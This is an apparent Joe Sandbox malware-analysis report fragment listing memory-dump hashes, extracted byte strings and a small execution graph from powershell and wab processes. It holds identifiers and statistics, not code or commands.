                          • Source File: 00000001.00000002.2186473863.0000000004620000.00000040.00000800.00020000.00000000.sdmp, Offset: 04620000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_4620000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 87c1dc626b05d4d319c5ce7634efc75334aeff110d317c9b0931639919968249
                          • Instruction ID: b4a2845afe6bca562c0a58150a95432f572d8782df1c546c72217f02c6dde0e1
                          • Opcode Fuzzy Hash: 87c1dc626b05d4d319c5ce7634efc75334aeff110d317c9b0931639919968249
                          • Instruction Fuzzy Hash: 4151C734A00219AFDB05CF98D584A9DBBB2FF88314F288559E404AB365D731ED86CF90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000001.00000002.2192636273.00000000074E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074E0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_74e0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: a1039535da6d95c3433694dcfc32fb034fe2882ab0dbc8ff982586f3c3b8826c
                          • Instruction ID: c5e7a6e3b784e20bbe2beab9d54ae5e30455a445762394703f8c352d94c21ea2
                          • Opcode Fuzzy Hash: a1039535da6d95c3433694dcfc32fb034fe2882ab0dbc8ff982586f3c3b8826c
                          • Instruction Fuzzy Hash: 373134F16042069FCB204E348D417FABBE5EF8227AF1844B7D900DF395DB799A5683A1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000001.00000002.2192636273.00000000074E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074E0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_74e0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 49598fe38c83bf47292378d0514a66ab44da3b17fef546965c811b6470e50db5
                          • Instruction ID: 2700aefb295a1dbdc9d83d32754e0f1c11d600c6684499d3a536ff132e529004
                          • Opcode Fuzzy Hash: 49598fe38c83bf47292378d0514a66ab44da3b17fef546965c811b6470e50db5
                          • Instruction Fuzzy Hash: 8C2149B17C030E67DB245A6A9900BB7B6DA9BC4726F24883BA509CF385ED75D881C361
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000001.00000002.2186473863.0000000004620000.00000040.00000800.00020000.00000000.sdmp, Offset: 04620000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_4620000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 3031b4493ae431f825070b4281039cd9bcc53094e57ac7c21d0c38de6ce4c175
                          • Instruction ID: 9b98b2ff3db313b1a507714399a976a586f1abda8adb803dd0ae5331a055c530
                          • Opcode Fuzzy Hash: 3031b4493ae431f825070b4281039cd9bcc53094e57ac7c21d0c38de6ce4c175
                          • Instruction Fuzzy Hash: 8941E1B0D00249EFDB10DF99C584ADEBFB5BF48314F10802AE809AB214DB75A985CF90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000001.00000002.2186473863.0000000004620000.00000040.00000800.00020000.00000000.sdmp, Offset: 04620000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_4620000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 08c9794cea233d143e1cc5bad463d79c6bc57c6bb4e743297fedc7318e230338
                          • Instruction ID: 870466c4ca6f4821de0873a9bf981ed8019fb74f5d4494c1c74aac215cec21ed
                          • Opcode Fuzzy Hash: 08c9794cea233d143e1cc5bad463d79c6bc57c6bb4e743297fedc7318e230338
                          • Instruction Fuzzy Hash: F1313670A006059FCB14CF98C994AAAFBF1FF89310B258699D959AB366D331FC41CF90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000001.00000002.2192636273.00000000074E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074E0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_74e0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 88c9d034049e193020981abd9aadb19712b741c5f527e3d9e89d7f232f12cb30
                          • Instruction ID: eba85a6f5e834b301de49fee6af4974ff815778ccfbcdfd75afe5a46472e3962
                          • Opcode Fuzzy Hash: 88c9d034049e193020981abd9aadb19712b741c5f527e3d9e89d7f232f12cb30
                          • Instruction Fuzzy Hash: 6A217CF178434A6BD7254A76C9407B37BE99F81721F18886BE944CF3C6EA789885C331
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000001.00000002.2192636273.00000000074E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074E0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_74e0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: a5939b733be1d396df8ce794c4816fcaee3e59f18ac40f0b33f05d1acab03304
                          • Instruction ID: 206e6414481afb45e0ba45922ea7adfa4b63200694ed6ee8a416b47a7420d240
                          • Opcode Fuzzy Hash: a5939b733be1d396df8ce794c4816fcaee3e59f18ac40f0b33f05d1acab03304
                          • Instruction Fuzzy Hash: DF01D47634021A9BC72455AAE8005BBBB9DDFCA233F14C43BD555DA350D672C846C760
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000001.00000002.2186473863.0000000004620000.00000040.00000800.00020000.00000000.sdmp, Offset: 04620000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_4620000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: be7f6083663b185bb86824ba653c018f64141de68ac81229882c74bb1dd1d059
                          • Instruction ID: 44dec39dd5b1f91b350be3a475b6078e9877aedd31d53d14ac5591e09764030b
                          • Opcode Fuzzy Hash: be7f6083663b185bb86824ba653c018f64141de68ac81229882c74bb1dd1d059
                          • Instruction Fuzzy Hash: BF11E935A00219EFDB05CF98D984A9DFBB2FF48314F288558E405AB365D771E982CF40
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000001.00000002.2186473863.0000000004620000.00000040.00000800.00020000.00000000.sdmp, Offset: 04620000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_4620000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: d67e1cc3c7ed351efa8481a57c7b58be6e09f1ad5fe24d2001f7bc2aa0986b50
                          • Instruction ID: a0074a716285c780366ab83ee7f302e635cd51ccfdc0110afefea364eecffb01
                          • Opcode Fuzzy Hash: d67e1cc3c7ed351efa8481a57c7b58be6e09f1ad5fe24d2001f7bc2aa0986b50
                          • Instruction Fuzzy Hash: E6F0B775A001159FCB15CB9CD990AEEF7B1FF88324F208159E515A73A1C736AC52CB50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000001.00000002.2192636273.00000000074E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074E0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_74e0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 584a3913bed7d41f6751d29dc0af2e109adf5df94d8de11209de24b86f245c04
                          • Instruction ID: 2108930940694c1c8b8ad4272d9396267f2db374b9021a0985f6588530823504
                          • Opcode Fuzzy Hash: 584a3913bed7d41f6751d29dc0af2e109adf5df94d8de11209de24b86f245c04
                          • Instruction Fuzzy Hash: 6BA002742010009BC644DB54C991814F761EFC5219728C4DDA8198B256CF33ED03DA40
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2192636273.00000000074E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074E0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_74e0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: 4'^q$4'^q$4'^q$4'^q$d5qk$tP^q$tP^q$$^q$$^q$$^q$$^q$wl$wl
                          • API String ID: 0-268659279
                          • Opcode ID: 482d4ad68c3554cb954022c864b0e65074ea83a458053ebc5917dbe1a7c2cad7
                          • Instruction ID: c5e0b598810cb84cfc25e5adc778bd71436a890267bd7a7a3d79aacf49a2b574
                          • Opcode Fuzzy Hash: 482d4ad68c3554cb954022c864b0e65074ea83a458053ebc5917dbe1a7c2cad7
                          • Instruction Fuzzy Hash: E9E14BB1B043469FDB268B7898006E7BBAAAFC2332F1484BBD545CF355DA31C845C7A1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2192636273.00000000074E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074E0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_74e0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: 4'^q$4'^q$tP^q$tP^q$tP^q$tP^q$$^q$(dq$(dq$(dq$(dq
                          • API String ID: 0-459999756
                          • Opcode ID: c83e7e1fed2828edf28c530a1b5a27ffda246206431a77eb1cb0ca73d99762e0
                          • Instruction ID: 1dbeb53bed53e67957c263c59c3a66654d974c9798de1ebc05942110dcd95205
                          • Opcode Fuzzy Hash: c83e7e1fed2828edf28c530a1b5a27ffda246206431a77eb1cb0ca73d99762e0
                          • Instruction Fuzzy Hash: 67A11AB1B001299FEB14DF64C5406BB7BE6BF85321F14896AE8415F395CB32DD81C7A1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2192636273.00000000074E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074E0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_74e0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: 4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q$$^q$wl$wl
                          • API String ID: 0-1202610410
                          • Opcode ID: c6580f3406e0a17e584b7fe0a928b848d95792a709a5a07259b7c1ca64719f61
                          • Instruction ID: 18987ed9c2512cd8e214fc25ae813c930d2f9c0ed41b5d148ce5f76c054263b9
                          • Opcode Fuzzy Hash: c6580f3406e0a17e584b7fe0a928b848d95792a709a5a07259b7c1ca64719f61
                          • Instruction Fuzzy Hash: 1AB13AB17043468FC7269B699800AB7BBE9AFC5232F1488ABD445CF351DB31D986C7A1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2192636273.00000000074E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074E0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_74e0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: 4'^q$4'^q$4'^q$4'^q$$^q$$^q$$^q
                          • API String ID: 0-3199432138
                          • Opcode ID: fde5bb43d09bd922aa902c6f25793ae203da0a95b08bbed036a90d9f8598ae8b
                          • Instruction ID: 569a9b02ef553d506cebc0a2319b123fc6dfec74fbea17c401739dd4a3a06428
                          • Opcode Fuzzy Hash: fde5bb43d09bd922aa902c6f25793ae203da0a95b08bbed036a90d9f8598ae8b
                          • Instruction Fuzzy Hash: D49149B1B04226DFEB254E7488006EB7BEAAFC6632F14487BD900CB351DB35C986C761
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2192636273.00000000074E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074E0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_74e0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: XRcq$XRcq$XRcq$tP^q$tP^q$$^q
                          • API String ID: 0-1682816917
                          • Opcode ID: f9f78d22a4e786feb91dccd2cce0259f5ec1bf38f85bd7b0ed576b2655487730
                          • Instruction ID: ef1754cf165b85b1fe7dcdd749766faee96829bf41cca63fa1ab51dbbb06a7a1
                          • Opcode Fuzzy Hash: f9f78d22a4e786feb91dccd2cce0259f5ec1bf38f85bd7b0ed576b2655487730
                          • Instruction Fuzzy Hash: FD612B71B40106DFCB649F689500ABBBBE6AFC5321F14C46AE4115F396CB31DD4AC761
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2192636273.00000000074E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074E0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_74e0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: 4'^q$4'^q$tLsk$x.rk$-rk
                          • API String ID: 0-3635802942
                          • Opcode ID: 3ad95f67bcf8690cbff7e97ff8d3fd71a5f9037b5889f6c0789d034fc3ea4e4c
                          • Instruction ID: 3976faa166ee569aa2b489d928d6732bf310c6fecf9d0c4595f0c587f031f4ad
                          • Opcode Fuzzy Hash: 3ad95f67bcf8690cbff7e97ff8d3fd71a5f9037b5889f6c0789d034fc3ea4e4c
                          • Instruction Fuzzy Hash: 62023DB4A00219DFCB24DB24CA51BDABBB2FF88314F1084A9D5096F795CB31AD85CF91
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2192636273.00000000074E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074E0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_74e0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: 4'^q$4'^q$$^q$$^q$$^q
                          • API String ID: 0-3272787073
                          • Opcode ID: 4bc703eac4efb89ff22985af5e878296ba3c7d9a11a537811e547d2d20669411
                          • Instruction ID: 5a8f795d21abc860f3dc8232f73194664b45280f95a8b2d9f1744da71dd8595d
                          • Opcode Fuzzy Hash: 4bc703eac4efb89ff22985af5e878296ba3c7d9a11a537811e547d2d20669411
                          • Instruction Fuzzy Hash: 07414AB07043069FCB258A3499106FB7BE6AFC1221F24486BD515CF3A1DB75C946C791
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2192636273.00000000074E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074E0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_74e0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: (o^q$(o^q$(o^q$(o^q
                          • API String ID: 0-1978863864
                          • Opcode ID: 7eeb0cb0776aa01d53ca741d197d536844fd00ddf3207b9b76590ab1c2394327
                          • Instruction ID: 28e45bc8c43071db651c4abec9e41c0193eef318dd6a4f03c55cc4f178eb484b
                          • Opcode Fuzzy Hash: 7eeb0cb0776aa01d53ca741d197d536844fd00ddf3207b9b76590ab1c2394327
                          • Instruction Fuzzy Hash: 45F138B1B04206DFCB258F68D844BEB7BA5EF81322F14886BE4558F391DB35C945CB61
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2192636273.00000000074E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074E0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_74e0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: 4'^q$d5qk$tP^q$$^q
                          • API String ID: 0-3798348130
                          • Opcode ID: 998ccf4c6e4221f6d179b9e473ee880c917bd524864e778bfd75b2a72d957338
                          • Instruction ID: 8872bdb49b47dedef70d1b43526691bb02c3946f749ba015b5c19cd6e40cd347
                          • Opcode Fuzzy Hash: 998ccf4c6e4221f6d179b9e473ee880c917bd524864e778bfd75b2a72d957338
                          • Instruction Fuzzy Hash: 0A6148F0A043479FCB228B688940BE7BBAAAF81336F1884BBD5049F351D731D845C7A1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2192636273.00000000074E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074E0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_74e0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: $^q$$^q$$^q$$^q
                          • API String ID: 0-2125118731
                          • Opcode ID: ec442d86fcc5819896dcbcdcb869f72593f040c3f554c371c2afea027048cb17
                          • Instruction ID: 7b8b6d1a8f5cfb1108afb0df8b9e271e8893e472eecac116ba607d78e25660ea
                          • Opcode Fuzzy Hash: ec442d86fcc5819896dcbcdcb869f72593f040c3f554c371c2afea027048cb17
                          • Instruction Fuzzy Hash: F9213AF1310206ABD734197D5900BA776DE5BC1726F24883BA405CF3C5DD75E845C262
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2192636273.00000000074E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074E0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_74e0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: tP^q$$^q$$^q$$^q
                          • API String ID: 0-3061638629
                          • Opcode ID: fa93091c60539a3b26f24b05605cca020dee125516c26fa5e0b844ab4cabddd6
                          • Instruction ID: 8571a043843f89c5c9f00ec06c11e7544751f252649781614cafbd589e35679e
                          • Opcode Fuzzy Hash: fa93091c60539a3b26f24b05605cca020dee125516c26fa5e0b844ab4cabddd6
                          • Instruction Fuzzy Hash: 632123B26043568FC71A8F248804AA6BBF9AF82732B19459BE404CF362D735CE45C760
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2192636273.00000000074E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074E0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_74e0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: $^q$$^q$$^q$$^q
                          • API String ID: 0-2125118731
                          • Opcode ID: f50060a6c80f203cb58d789a6d59e7e74059f1363df872dafc4c4333df139113
                          • Instruction ID: 1843404e4c820711c0e97149dbba274763d7cdf5a37eaac6f6d4339888d5d0b3
                          • Opcode Fuzzy Hash: f50060a6c80f203cb58d789a6d59e7e74059f1363df872dafc4c4333df139113
                          • Instruction Fuzzy Hash: 0C21F7B5B043068FCB358E1499445F7BBFAAF41236F18C4ABC9448B301D735C589C792
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2192636273.00000000074E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074E0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_74e0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: 4'^q$4'^q$$^q$$^q
                          • API String ID: 0-2049395529
                          • Opcode ID: 62409de4b48ca111d756b86bd53d320e364d4895828ac90504ffcfd2a971966f
                          • Instruction ID: 19425190aaf91504820f154d373345c5f31b67e999d2e57b0281c5e152e38d22
                          • Opcode Fuzzy Hash: 62409de4b48ca111d756b86bd53d320e364d4895828ac90504ffcfd2a971966f
                          • Instruction Fuzzy Hash: 0E01B170A093964FC32B062859205667FF6AF8366172908EBD440CF3AACA658D4D83A3
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Execution Graph

                          Execution Coverage:3.3%
                          Dynamic/Decrypted Code Coverage:0%
                          Signature Coverage:100%
                          Total number of Nodes:4
                          Total number of Limit Nodes:0
                          execution_graph 284 583d53d 287 583d579 284->287 285 583d5aa NtProtectVirtualMemory 285->287 286 583d59e Sleep 286->284 287->284 287->285 287->286

                          Control-flow Graph

                          APIs
                          • Sleep.KERNELBASE(00000005), ref: 0583D5A0
                          Memory Dump Source
                          • Source File: 00000007.00000002.2920719514.0000000005439000.00000040.00000400.00020000.00000000.sdmp, Offset: 05439000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_5439000_wab.jbxd
                          Similarity
                          • API ID: Sleep
                          • String ID:
                          • API String ID: 3472027048-0
                          • Opcode ID: a55391a0987836cc8e7f0e5d8f7376e03ccb3f2c00ef3e66adce6014a78a78f8
                          • Instruction ID: 6f9703c99cc9fd5a253a76a3451c02d1b41800ba70d823f642ae5313bf08c88b
                          • Opcode Fuzzy Hash: a55391a0987836cc8e7f0e5d8f7376e03ccb3f2c00ef3e66adce6014a78a78f8
                          • Instruction Fuzzy Hash: 091127B1A413009FE7019F34C89DB8677B4BF253A9F458248EC458F1A6E374C884CF91
                          Uniqueness

                          Uniqueness Score: -1.00%